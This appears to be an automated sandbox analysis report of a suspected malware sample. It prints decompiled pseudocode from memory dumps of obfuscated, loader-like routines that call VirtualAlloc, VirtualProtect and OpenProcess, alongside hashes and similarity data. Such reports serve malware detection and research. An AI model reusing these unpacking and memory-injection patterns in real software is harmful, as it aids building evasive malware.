Opcode Fuzzy Hash: 6ee8f51e613eaef717c6bf70aa5e8ec27986d2ca59d295a1796ee4509976c97d
Instruction Fuzzy Hash: 2F135972904204EFEB049FA0C8C9BADBBF5FF48325F1584AEED899A149C7341594CF69

Uniqueness

Uniqueness Score: -1.00%

Function 04AF9305, Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 554
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 36%

			E04AF9305(signed int __ebx, signed int __ecx, void* __edx, signed int __edi, signed int __esi, void* __eflags) {
				intOrPtr _t284;
				signed int _t285;
				void* _t289;
				signed int _t290;
				signed int _t293;
				signed int _t295;
				signed int _t299;
				signed int _t302;
				signed int _t303;
				signed int _t305;
				signed int _t310;
				signed int _t311;
				signed int _t316;
				signed int _t317;
				signed int _t319;
				signed int _t322;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				void* _t330;
				void* _t332;
				signed int _t333;
				signed int _t337;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t352;
				signed int _t359;
				signed int _t361;
				void* _t370;
				signed int _t372;
				signed int _t373;
				signed int _t375;
				signed int _t391;
				signed int _t392;
				void* _t393;
				signed int _t394;
				void* _t403;
				signed int _t417;
				void* _t419;
				signed int _t420;
				signed int _t422;
				signed int _t440;
				void* _t443;
				signed int _t446;
				signed int _t459;
				signed int* _t460;

				_t417 = __esi;
				_t391 = __edi;
				_t344 = __ecx;
				_t342 = __ebx;
				 *(_t440 - 0xc) = 0;
				_push( *(_t440 - 0xc));
				 *_t459 =  *_t459 | _t459;
				_t284 =  *((intOrPtr*)(__ebx + 0xa90138))();
				 *_t459 = __edx;
				 *((intOrPtr*)(__ebx + 0x41d167)) = _t284;
				_t370 = 0;
				_t285 = E04AF5B06(_t284, __ecx, _t370, __edi);
				if( *(_t342 + 0x41cc33) == 0) {
					_t285 =  *((intOrPtr*)(_t342 + 0xa90140))();
					 *_t459 = _t440;
					 *(_t342 + 0x41cc33) = 0 ^ _t285;
					_t440 = 0;
				}
				_t372 = _t342 | _t342;
				_t343 = _t372;
				_t373 = _t370;
				if(_t372 == 0) {
					L13:
					 *(_t440 - 8) = 0;
					_push( *(_t440 - 8));
					 *_t459 =  *_t459 + _t285;
					_pop( *_t68);
					if( *((intOrPtr*)(_t343 + 0x41c79e)) == 0) {
						 *_t459 =  *_t459 & 0x00000000;
						 *_t459 =  *_t459 + _t285;
						 *((intOrPtr*)(_t459 + 4)) =  *((intOrPtr*)(_t343 + 0x41c394));
						_t417 = _t417;
						_t328 =  *((intOrPtr*)(_t343 + 0xa90134))(_t373);
						 *(_t440 - 8) = _t373;
						 *((intOrPtr*)(_t343 + 0x41c79e)) = _t328;
						_t373 =  *(_t440 - 8);
						_t285 = _t440;
					}
					 *(_t343 + 0x41c6cd) = 2;
					 *(_t440 - 0xc) = _t344;
					 *(_t343 + 0x41c038) =  *(_t343 + 0x41c038) & 0x00000000;
					 *(_t343 + 0x41c038) =  *(_t343 + 0x41c038) ^ _t344 & 0x00000000 ^ _t285;
					_t347 =  *(_t440 - 0xc);
					if( *(_t343 + 0x41c6ea) == 0) {
						 *((intOrPtr*)(_t459 + 4)) =  *((intOrPtr*)(_t343 + 0x41cf37));
						_t417 = _t417;
						_t285 =  *((intOrPtr*)(_t343 + 0xa901b8))(0, _t391);
						 *(_t440 - 8) = _t391;
						 *(_t343 + 0x41c6ea) = _t285;
						_t391 =  *(_t440 - 8);
					}
					if( *((intOrPtr*)(_t343 + 0x41c507)) > 0) {
						if( *(_t343 + 0x41c182) == 0) {
							_t440 =  *_t459;
							 *_t459 =  *((intOrPtr*)(_t343 + 0x41d91a));
							_t327 =  *((intOrPtr*)(_t343 + 0xa90134))(_t440);
							 *(_t343 + 0x41c182) =  *(_t343 + 0x41c182) & 0x00000000;
							 *(_t343 + 0x41c182) =  *(_t343 + 0x41c182) | _t373 -  *_t459 | _t327;
							_t373 = _t373;
						}
						 *(_t440 - 0xc) =  *(_t440 - 0xc) & 0x00000000;
						 *_t459 =  *_t459 | _t343 + 0x0041c6cd;
						 *_t459 =  *_t459 - _t343;
						 *_t459 =  *_t459 + _t343 + 0x41d837;
						 *_t459 =  *_t459 & 0x00000000;
						 *_t459 =  *_t459 ^ _t343 + 0x0041cba0;
						_t316 =  *((intOrPtr*)(_t343 + 0xa90130))(_t343,  *(_t440 - 0xc));
						 *(_t343 + 0x41d6bc) =  *(_t343 + 0x41d6bc) & 0x00000000;
						 *(_t343 + 0x41d6bc) =  *(_t343 + 0x41d6bc) ^ _t391 ^  *_t459 ^ _t316;
						_t391 = _t391;
						_t317 = _t347;
						 *(_t440 - 4) =  *(_t440 - 4) & 0x00000000;
						_push( *(_t440 - 4));
						 *_t459 =  *_t459 | _t317;
						_push(_t347);
						 *_t459 = 0x40;
						if( *(_t343 + 0x41c044) == 0) {
							_t317 =  *((intOrPtr*)(_t343 + 0xa90140))();
							 *(_t440 - 0xc) = _t417;
							 *(_t343 + 0x41c044) = 0 ^ _t317;
							_t417 =  *(_t440 - 0xc);
						}
						_push(_t347);
						 *((intOrPtr*)(_t459 + 4)) =  *((intOrPtr*)(_t343 + 0x41d5c2));
						_t319 = _t317;
						if( *(_t343 + 0x41d44f) == 0) {
							_t326 = _t343 + 0x41c114;
							 *(_t440 - 8) = 0;
							 *_t459 =  *_t459 | _t326;
							 *_t326 = 0x14;
							_t319 =  *((intOrPtr*)(_t343 + 0xa901c4))( *(_t440 - 8));
							 *(_t343 + 0x41d44f) =  *(_t343 + 0x41d44f) & 0x00000000;
							 *(_t343 + 0x41d44f) =  *(_t343 + 0x41d44f) ^ _t391 & 0x00000000 ^ _t319;
							_t391 = _t391;
						}
						 *((intOrPtr*)(_t459 + 4)) =  *((intOrPtr*)(_t343 + 0x41c507));
						_t352 = _t347;
						 *_t459 =  *_t459 ^ _t391;
						 *_t459 = _t343 + 0x41d02f;
						 *_t459 = _t343 + 0x41c893;
						_t322 =  *((intOrPtr*)(_t343 + 0xa90130))( *(_t440 - 0xc), _t391, _t319);
						 *(_t343 + 0x41d5de) =  *(_t343 + 0x41d5de) & 0x00000000;
						 *(_t343 + 0x41d5de) =  *(_t343 + 0x41d5de) ^ _t352 & 0x00000000 ^ _t322;
						_t347 = _t352; // executed
						_t285 = VirtualProtect(??, ??, ??, ??);
						if( *(_t343 + 0x41c63f) == 0) {
							 *_t459 = _t285;
							_t391 =  *_t459;
							 *_t459 =  *((intOrPtr*)(_t343 + 0x41cd4a));
							 *((intOrPtr*)(_t459 + 4)) =  *((intOrPtr*)(_t343 + 0x41cb44));
							_t325 =  *((intOrPtr*)(_t343 + 0xa901b8))(_t391, _t391,  *(_t440 - 4));
							 *(_t343 + 0x41c63f) =  *(_t343 + 0x41c63f) & 0x00000000;
							 *(_t343 + 0x41c63f) =  *(_t343 + 0x41c63f) | _t347 -  *_t459 | _t325;
							_t347 = _t347;
							_t285 = _t285;
						}
					}
					 *_t459 = 0x248;
					 *_t459 =  *_t459 & 0x00000000;
					 *_t459 =  *_t459 | _t285;
					 *_t459 =  *_t459 & 0x00000000;
					 *_t459 =  *_t459 + _t343 + 0x41d79d;
					 *(_t440 - 0xc) =  *(_t440 - 0xc) & 0x00000000;
					 *_t459 =  *_t459 | _t343 + 0x0041d733;
					_push( *((intOrPtr*)(_t343 + 0xa90130))( *(_t440 - 0xc), _t440, _t373, _t285));
					_pop( *_t157);
					_push( *(_t440 - 0xc));
					_pop( *_t159);
					_pop(_t289);
					_push(_t417);
					 *_t459 = 0x568;
					if( *((intOrPtr*)(_t343 + 0x41cfd7)) == 0) {
						 *_t459 = _t289;
						_t391 =  *_t459;
						 *_t459 =  *((intOrPtr*)(_t343 + 0x41c43c));
						_push( *((intOrPtr*)(_t343 + 0xa90134))( *(_t440 - 8)));
						_pop( *_t165);
						_push( *(_t440 - 0xc));
						_pop( *_t167);
						_t289 = _t391;
					}
					_t290 = L04AF21AB(_t289, _t343, _t347, _t373);
					if(_t290 != _t343) {
						if( *(_t343 + 0x41d379) == 0) {
							 *((intOrPtr*)(_t459 + 4)) =  *((intOrPtr*)(_t343 + 0x41c82f));
							_t417 = _t417;
							_t290 =  *((intOrPtr*)(_t343 + 0xa901c8))(_t373);
							 *_t459 = _t373;
							 *(_t343 + 0x41d379) = 0 ^ _t290;
							_t373 = 0;
						}
						_push(_t290);
						 *_t459 =  *(_t343 + 0x41ce30);
						if( *(_t343 + 0x41c18e) == 0) {
							_t311 =  *((intOrPtr*)(_t343 + 0xa90140))();
							 *(_t440 - 8) = _t391;
							 *(_t343 + 0x41c18e) =  *(_t343 + 0x41c18e) & 0x00000000;
							 *(_t343 + 0x41c18e) =  *(_t343 + 0x41c18e) | _t391 & 0x00000000 | _t311;
							_t391 =  *(_t440 - 8);
						}
						_push(_t440);
						 *((intOrPtr*)(_t459 + 4)) =  *((intOrPtr*)(_t343 + 0x41c5cb));
						_t403 = _t391;
						if( *(_t343 + 0x41c221) == 0) {
							 *_t459 =  *_t459 - _t417;
							 *_t459 =  *_t459 + _t403;
							_t310 =  *((intOrPtr*)(_t343 + 0xa901c8))(_t417);
							 *(_t440 - 4) = _t373;
							 *(_t343 + 0x41c221) = 0 ^ _t310;
							_t373 =  *(_t440 - 4);
						}
						_t290 = L04AF612E(_t343, _t347, _t373); // executed
						if( *(_t343 + 0x41d1fe) == 0) {
							 *_t459 =  *((intOrPtr*)(_t343 + 0x41cd8d));
							_t290 =  *((intOrPtr*)(_t343 + 0xa901cc))(_t290);
							 *(_t440 - 8) = _t417;
							 *(_t343 + 0x41d1fe) = _t290;
							_t417 =  *(_t440 - 8);
						}
					}
					 *_t198 =  *((intOrPtr*)(_t343 + 0x41d5c2));
					_t348 =  *(_t440 - 4);
					if( *(_t343 + 0x41cebd) == 0) {
						 *(_t440 - 8) =  *(_t440 - 8) & 0x00000000;
						 *_t459 =  *_t459 | _t348;
						_t290 =  *((intOrPtr*)(_t343 + 0xa90140))( *(_t440 - 8));
						 *(_t343 + 0x41cebd) =  *(_t343 + 0x41cebd) & 0x00000000;
						 *(_t343 + 0x41cebd) =  *(_t343 + 0x41cebd) ^ _t440 -  *_t459 ^ _t290;
						_t440 = _t440;
						_pop(_t348);
					}
					 *_t210 =  *((intOrPtr*)(_t343 + 0x41c507));
					_t392 =  *(_t440 - 4);
					 *_t459 =  *_t459 & 0x00000000;
					 *_t459 =  *_t459 + _t348;
					 *_t459 =  *_t459 - _t417;
					 *_t459 =  *_t459 ^ _t343 + 0x0041cc78;
					 *(_t440 - 0xc) = 0;
					 *_t459 =  *_t459 + _t343 + 0x41d246;
					_t293 =  *((intOrPtr*)(_t343 + 0xa90130))( *(_t440 - 0xc), _t417, _t290);
					 *(_t343 + 0x41d9dc) =  *(_t343 + 0x41d9dc) & 0x00000000;
					 *(_t343 + 0x41d9dc) =  *(_t343 + 0x41d9dc) ^ _t440 ^  *_t459 ^ _t293;
					_t443 = _t440;
					_pop(_t349);
					_t419 = _t392 | _t392;
					_t393 = _t419;
					_t420 = _t417;
					if(_t419 != 0) {
						 *_t459 =  *_t459 ^ _t393;
						 *_t459 =  *_t459 + _t349;
						 *_t459 =  *_t459 - _t349;
						 *_t459 =  *_t459 ^ _t343 + 0x0041cf7b;
						_t305 =  *((intOrPtr*)(_t343 + 0xa90128))(_t393);
						 *(_t443 - 0xc) = _t420;
						 *(_t343 + 0x41d395) =  *(_t343 + 0x41d395) & 0x00000000;
						 *(_t343 + 0x41d395) =  *(_t343 + 0x41d395) ^ _t420 & 0x00000000 ^ _t305;
						_t420 =  *(_t443 - 0xc);
						_t349 = _t349;
						 *_t459 =  *_t459 ^ _t373;
						 *_t459 =  *_t459 | _t393;
						_t293 = E04AF2D03(_t305, _t343, _t349, _t373, _t393, _t373);
						if( *(_t343 + 0x41c745) == 0) {
							 *_t459 =  *_t459 - _t373;
							 *_t459 =  *_t459 + _t349;
							_t293 =  *((intOrPtr*)(_t343 + 0xa90110))();
							 *(_t443 - 0xc) = _t420;
							 *(_t343 + 0x41c745) = 0 ^ _t293;
							_t420 =  *(_t443 - 0xc);
							_t349 = _t373;
						}
					}
					_t446 = _t443;
					_t295 = memset(_t393, _t293 ^ _t293, _t349 << 0);
					_t460 = _t459 + 0xc;
					_t394 = _t393 + _t349;
					if( *(_t343 + 0x41d520) == 0) {
						_t295 =  *((intOrPtr*)(_t343 + 0xa90110))();
						 *_t460 = _t446;
						 *(_t343 + 0x41d520) = _t295;
						_t446 = 0;
					}
					if( *(_t343 + 0x41ce30) != _t343) {
						if( *(_t343 + 0x41c3f5) == 0) {
							_t303 =  *((intOrPtr*)(_t343 + 0xa9013c))();
							 *(_t343 + 0x41c3f5) =  *(_t343 + 0x41c3f5) & 0x00000000;
							 *(_t343 + 0x41c3f5) =  *(_t343 + 0x41c3f5) | _t420 ^  *_t460 | _t303;
							_t420 = _t420;
						}
						_push(_t394);
						_t394 =  *_t460;
						 *_t460 =  *(_t343 + 0x41ce30);
						if( *(_t343 + 0x41d7c9) == 0) {
							_t302 =  *((intOrPtr*)(_t343 + 0xa90110))();
							 *(_t446 - 0xc) = _t373;
							 *(_t343 + 0x41d7c9) = 0 ^ _t302;
							_t373 =  *(_t446 - 0xc);
						}
						_t299 = E04AF3F1C(_t343, 0, _t373, _t394, _t420); // executed
						_push(_t446);
						_t460[1] =  *(_t343 + 0x41ce30);
						_t422 = _t420;
						if( *(_t343 + 0x41cd6d) == 0) {
							 *_t460 = _t373;
							_t299 =  *((intOrPtr*)(_t343 + 0xa901c8))( *(_t446 - 8));
							 *(_t446 - 0xc) = _t394;
							 *(_t343 + 0x41cd6d) =  *(_t343 + 0x41cd6d) & 0x00000000;
							 *(_t343 + 0x41cd6d) =  *(_t343 + 0x41cd6d) | _t394 & 0x00000000 ^ _t299;
							_t394 =  *(_t446 - 0xc);
						}
						_t295 = E04AFC38A(_t299, _t343, 0, _t373, _t394, _t422);
						if( *(_t343 + 0x41c342) == 0) {
							_t460[1] =  *(_t343 + 0x41d757);
							_t394 =  *_t460;
							 *_t460 =  *(_t343 + 0x41d952);
							_t295 =  *((intOrPtr*)(_t343 + 0xa901b8))(_t394, _t295, _t373);
							 *(_t446 - 8) = _t422;
							 *(_t343 + 0x41c342) =  *(_t343 + 0x41c342) & 0x00000000;
							 *(_t343 + 0x41c342) =  *(_t343 + 0x41c342) | _t422 & 0x00000000 ^ _t295;
						}
					}
					_push(_t394);
					_t375 = _t373 & 0x00000000 | _t394 -  *_t460 |  *(_t343 + 0x41d375);
					_t460[5] = _t375;
					 *(_t446 - 4) = _t295;
					_push(_t375 & 0x00000000 ^ (_t295 ^  *(_t446 - 4) |  *(_t343 + 0x41d375)));
					_pop( *_t281);
					_push( *(_t446 - 4));
					_pop( *_t283);
					asm("popad");
					return  *(_t446 - 4);
				} else {
					if( *(_t343 + 0x41cad0) == 0) {
						_t341 = _t343 + 0x41d3fa;
						 *(_t440 - 8) = 0;
						 *_t459 =  *_t459 ^ _t341;
						 *_t341 = 0x14;
						_t285 =  *((intOrPtr*)(_t343 + 0xa901c4))( *(_t440 - 8));
						 *_t459 = _t373;
						 *(_t343 + 0x41cad0) = _t285;
						_t373 = 0;
					}
					_push(_t440);
					 *_t459 =  *_t459 + 4;
					 *_t459 =  *_t459 - _t440;
					if( *((intOrPtr*)(_t343 + 0x41d56f)) == 0) {
						_push(_t344);
						 *_t459 =  *((intOrPtr*)(_t343 + 0x41c90a));
						_push(_t391);
						_t391 =  *_t459;
						 *_t459 =  *((intOrPtr*)(_t343 + 0x41cf2f));
						_push(_t391);
						_push( *_t459);
						 *((intOrPtr*)(_t459 + 4)) =  *((intOrPtr*)(_t343 + 0x41d94a));
						_pop(_t344);
						 *_t459 = 0x5b;
						 *_t459 = 0x1a;
						_t373 =  *_t459;
						 *_t459 =  *((intOrPtr*)(_t343 + 0x41ca8d));
						 *((intOrPtr*)(_t459 + 4)) =  *((intOrPtr*)(_t343 + 0x41caa4));
						_push( *((intOrPtr*)(_t343 + 0xa901bc))(_t285, _t344, _t373, _t440, _t459));
						_pop( *_t26);
						_push( *(_t440 - 0xc));
						_pop( *_t28);
					}
					_push(_t373);
					 *_t459 = 0x1000;
					if( *(_t343 + 0x41d2d1) == 0) {
						 *_t459 =  *((intOrPtr*)(_t343 + 0x41c976));
						_t337 =  *((intOrPtr*)(_t343 + 0xa901c8))(_t440);
						 *(_t343 + 0x41d2d1) = 0 ^ _t337;
						_t440 = 0;
					}
					 *((intOrPtr*)(_t459 + 4)) =  *((intOrPtr*)(_t343 + 0x41cf5b));
					 *_t459 = _t343 + 0x41d074;
					_t330 =  *((intOrPtr*)(_t343 + 0xa90128))( *(_t440 - 0xc), 0, _t344, _t391);
					 *_t459 =  *_t459 ^ _t343;
					 *_t459 =  *_t459 + _t330;
					 *_t459 = _t343 + 0x41c6b5;
					_t332 =  *((intOrPtr*)(_t343 + 0xa90128))( *(_t440 - 8), _t343);
					_pop(_t359);
					_t333 = _t332 + _t359;
					 *(_t440 - 4) = _t391;
					_t361 = _t359 & 0x00000000 ^ _t391 ^  *(_t440 - 4) ^  *(_t343 + 0x41d2e9);
					_t391 =  *(_t440 - 4);
					if(_t361 > _t333) {
						 *(_t440 - 0xc) = 0;
						 *_t459 =  *_t459 ^ _t343 + 0x0041d074;
						 *_t459 =  *_t459 - _t343;
						 *_t459 = _t343 + 0x41c6b5;
						_t333 =  *((intOrPtr*)(_t343 + 0xa9012c))(_t343,  *(_t440 - 0xc));
					}
					 *(_t440 - 8) = _t361;
					 *(_t343 + 0x41d5e6) =  *(_t343 + 0x41d5e6) & 0x00000000;
					 *(_t343 + 0x41d5e6) =  *(_t343 + 0x41d5e6) ^ (_t361 ^  *(_t440 - 8) | _t333);
					_t344 =  *(_t440 - 8);
					_t285 = VirtualAlloc(??, ??, ??, ??);
					if( *((intOrPtr*)(_t343 + 0x41d003)) == 0) {
						 *_t459 =  *_t459 & 0x00000000;
						 *_t459 =  *_t459 ^ _t285;
						 *((intOrPtr*)(_t459 + 4)) =  *((intOrPtr*)(_t343 + 0x41d177));
						_t417 = _t417;
						_push( *((intOrPtr*)(_t343 + 0xa901c8))(_t417));
						_pop( *_t63);
						_push( *(_t440 - 8));
						_pop( *_t65);
						_t285 = _t391;
					}
					goto L13;
				}
			}

0x04af9305
0x04af9305
0x04af9305
0x04af9305
0x04af9305
0x04af930c
0x04af930f
0x04af9312
0x04af931a
0x04af9321
0x04af9327
0x04af9328
0x04af9334
0x04af9336
0x04af933e
0x04af9345
0x04af934b
0x04af934b
0x04af934f
0x04af9351
0x04af9353
0x04af9354
0x04af94fa
0x04af94fa
0x04af9501
0x04af9504
0x04af9507
0x04af9514
0x04af9517
0x04af951b
0x04af9526
0x04af952a
0x04af952b
0x04af9531
0x04af9538
0x04af953e
0x04af9541
0x04af9541
0x04af9542
0x04af954c
0x04af9554
0x04af955b
0x04af9561
0x04af956b
0x04af9575
0x04af9579
0x04af957c
0x04af9582
0x04af9589
0x04af958f
0x04af958f
0x04af9599
0x04af95a6
0x04af95af
0x04af95af
0x04af95b2
0x04af95be
0x04af95c5
0x04af95cb
0x04af95cb
0x04af95d2
0x04af95d9
0x04af95e3
0x04af95e6
0x04af95f0
0x04af95f4
0x04af95f7
0x04af9603
0x04af960a
0x04af9610
0x04af9611
0x04af9612
0x04af9616
0x04af9619
0x04af961c
0x04af961d
0x04af962b
0x04af962d
0x04af9633
0x04af963a
0x04af9640
0x04af9640
0x04af9643
0x04af964b
0x04af964f
0x04af9657
0x04af9659
0x04af965f
0x04af9669
0x04af966c
0x04af9672
0x04af967e
0x04af9685
0x04af968b
0x04af968b
0x04af9694
0x04af9698
0x04af96a0
0x04af96a3
0x04af96af
0x04af96b2
0x04af96be
0x04af96c5
0x04af96cb
0x04af96cc
0x04af96d9
0x04af96de
0x04af96e8
0x04af96e8
0x04af96f3
0x04af96f8
0x04af9704
0x04af970b
0x04af9711
0x04af9712
0x04af9712
0x04af96d9
0x04af9714
0x04af971c
0x04af9720
0x04af972a
0x04af972e
0x04af9737
0x04af973e
0x04af9747
0x04af9748
0x04af974b
0x04af974e
0x04af9754
0x04af9755
0x04af9756
0x04af9764
0x04af9769
0x04af9773
0x04af9773
0x04af977c
0x04af977d
0x04af9780
0x04af9783
0x04af9789
0x04af9789
0x04af978a
0x04af9791
0x04af979e
0x04af97a8
0x04af97ac
0x04af97ad
0x04af97b5
0x04af97bc
0x04af97c2
0x04af97c2
0x04af97c3
0x04af97ca
0x04af97d4
0x04af97d6
0x04af97dc
0x04af97e4
0x04af97eb
0x04af97f1
0x04af97f1
0x04af97f4
0x04af97fc
0x04af9800
0x04af9808
0x04af980b
0x04af980e
0x04af9811
0x04af9817
0x04af981e
0x04af9824
0x04af9824
0x04af9827
0x04af9833
0x04af983c
0x04af983f
0x04af9845
0x04af984c
0x04af9852
0x04af9852
0x04af9833
0x04af985b
0x04af9861
0x04af9869
0x04af986b
0x04af9872
0x04af9875
0x04af9881
0x04af9888
0x04af988e
0x04af988f
0x04af988f
0x04af9896
0x04af989c
0x04af989e
0x04af98a2
0x04af98ac
0x04af98af
0x04af98b8
0x04af98c2
0x04af98c5
0x04af98d1
0x04af98d8
0x04af98de
0x04af98df
0x04af98e3
0x04af98e5
0x04af98e7
0x04af98e8
0x04af98eb
0x04af98ee
0x04af98f8
0x04af98fb
0x04af98fe
0x04af9904
0x04af990c
0x04af9913
0x04af9919
0x04af991c
0x04af991e
0x04af9921
0x04af9924
0x04af9930
0x04af9933
0x04af9936
0x04af9939
0x04af993f
0x04af9946
0x04af994c
0x04af994f
0x04af994f
0x04af9930
0x04af9957
0x04af9958
0x04af9958
0x04af9958
0x04af9961
0x04af9963
0x04af996b
0x04af9972
0x04af9978
0x04af9978
0x04af997f
0x04af998c
0x04af998e
0x04af999a
0x04af99a1
0x04af99a7
0x04af99a7
0x04af99a8
0x04af99af
0x04af99af
0x04af99b9
0x04af99bb
0x04af99c1
0x04af99c8
0x04af99ce
0x04af99ce
0x04af99d1
0x04af99d6
0x04af99de
0x04af99e2
0x04af99ea
0x04af99ef
0x04af99f2
0x04af99f8
0x04af9a00
0x04af9a07
0x04af9a0d
0x04af9a0d
0x04af9a10
0x04af9a1c
0x04af9a26
0x04af9a32
0x04af9a32
0x04af9a35
0x04af9a3b
0x04af9a43
0x04af9a4a
0x04af9a50
0x04af9a1c
0x04af9a53
0x04af9a60
0x04af9a63
0x04af9a67
0x04af9a7b
0x04af9a7c
0x04af9a7f
0x04af9a82
0x04af9a85
0x04af9a87
0x04af935a
0x04af9361
0x04af9363
0x04af9369
0x04af9373
0x04af9376
0x04af937c
0x04af9384
0x04af938b
0x04af9391
0x04af9391
0x04af9392
0x04af9393
0x04af9397
0x04af93a1
0x04af93a3
0x04af93aa
0x04af93ad
0x04af93b4
0x04af93b4
0x04af93b7
0x04af93b8
0x04af93bf
0x04af93c3
0x04af93c5
0x04af93cd
0x04af93db
0x04af93db
0x04af93e6
0x04af93f1
0x04af93f2
0x04af93f5
0x04af93f8
0x04af93f8
0x04af93fe
0x04af93ff
0x04af940d
0x04af9416
0x04af9419
0x04af9428
0x04af942e
0x04af942e
0x04af9437
0x04af9447
0x04af944a
0x04af9451
0x04af9454
0x04af9460
0x04af9463
0x04af9469
0x04af946a
0x04af946c
0x04af947b
0x04af947d
0x04af9482
0x04af948a
0x04af9494
0x04af949e
0x04af94a1
0x04af94a4
0x04af94a4
0x04af94aa
0x04af94b2
0x04af94b9
0x04af94bf
0x04af94c2
0x04af94cf
0x04af94d2
0x04af94d6
0x04af94e1
0x04af94e5
0x04af94ec
0x04af94ed
0x04af94f0
0x04af94f3
0x04af94f9
0x04af94f9
0x00000000
0x04af94cf

APIs

VirtualAlloc.KERNELBASE ref: 04AF94C2
VirtualProtect.KERNELBASE(?,?,?,?,?,?), ref: 04AF96CC

Strings

u), xrefs: 04AF9A10

Memory Dump Source

Source File: 00000005.00000002.812972364.0000000004AF0000.00000040.00000001.sdmp, Offset: 04AF0000, based on PE: true

Similarity

API ID: Virtual$AllocProtect
String ID: u)
API String ID: 2447062925-4106977603
Opcode ID: 9bb5cc23a22e36b759ebcf916fbe55db37de3493cf2fd16c1ea639645b18d9be
Instruction ID: 4d1fa7f0e81fa14bd3127b6eeaa8ed4bb4772fa490173e0d246205c6422c60f5
Opcode Fuzzy Hash: 9bb5cc23a22e36b759ebcf916fbe55db37de3493cf2fd16c1ea639645b18d9be
Instruction Fuzzy Hash: 43326BB2944204EFEB009FA0C8C9BAABBF5FF44311F1984AEED899E149C7742554CF65

Uniqueness

Uniqueness Score: -1.00%

Function 04AF1000, Relevance: 2.2, APIs: 1, Instructions: 697COMMON

Download Yara Rule

APIs

GetProcessId.KERNELBASE(?,?,00000000,?,?,?,?,?,?), ref: 04AF1265

Memory Dump Source

Source File: 00000005.00000002.812972364.0000000004AF0000.00000040.00000001.sdmp, Offset: 04AF0000, based on PE: true

Similarity

API ID: Process
String ID:
API String ID: 1235230986-0
Opcode ID: 568921bf107f1680b52cfc85463c90b9dcc75c76e2160c3fa50bca773d16f8b8
Instruction ID: 393747af1069254f99c7c2b6074bc8fb4411ff26cf7a2eab1b285185b63cfa43
Opcode Fuzzy Hash: 568921bf107f1680b52cfc85463c90b9dcc75c76e2160c3fa50bca773d16f8b8
Instruction Fuzzy Hash: 7B629C72904205DFEF04DFA0C8C97AABBF5FF88315F15856DED88AA149C7782450CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 100017A7, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100017A7(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E1000146C();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E100015A3(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E10001C12(_t45);
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E10001CA4(E100016EC,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E10001D7C(_t45,  &_v48) != 0) {
					 *0x100041b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t50 =  *_t57(_t44, 0, 0);
				if(_t50 == 0) {
					L9:
					 *0x100041b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E10001C8F(_t50 + _t15);
				 *0x100041b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50);
					E1000136A(_t44);
					goto L11;
				}
			}

0x100017b3
0x100017bc
0x100017c0
0x100018c8
0x100018ce
0x00000000
0x00000000
0x00000000
0x100017c6
0x100017c6
0x100017cb
0x100017d1
0x100017e0
0x100017e1
0x100017e4
0x100017e7
0x100017f0
0x100017f4
0x100017fa
0x100017fe
0x10001805
0x00000000
0x00000000
0x1000180b
0x10001812
0x10001816
0x100018b9
0x100018b9
0x100018c0
0x100018c2
0x100018c2
0x00000000
0x100018c0
0x1000181f
0x10001872
0x10001872
0x10001883
0x10001887
0x100018b5
0x10001889
0x1000188c
0x10001894
0x10001898
0x100018a0
0x100018a0
0x100018a7
0x100018a7
0x00000000
0x10001887
0x1000182d
0x1000186c
0x00000000
0x1000186c
0x1000182f
0x10001833
0x1000183e
0x10001842
0x10001864
0x10001864
0x00000000
0x10001864
0x10001844
0x10001849
0x10001850
0x10001855
0x00000000
0x10001857
0x1000185a
0x1000185d
0x00000000
0x1000185d

APIs

Part of subcall function 1000146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,100017B8,74E063F0,00000000), ref: 1000147B
Part of subcall function 1000146C: GetVersion.KERNEL32 ref: 1000148A
Part of subcall function 1000146C: GetCurrentProcessId.KERNEL32 ref: 10001499
Part of subcall function 1000146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 100014B2

GetSystemTime.KERNEL32(?,74E063F0,00000000), ref: 100017CB
SwitchToThread.KERNEL32 ref: 100017D1

Part of subcall function 100015A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 100015F9
Part of subcall function 100015A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,100017EC), ref: 1000168B
Part of subcall function 100015A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 100016A6

Sleep.KERNELBASE(00000000,00000000), ref: 100017F4
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 1000183C
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 1000185A
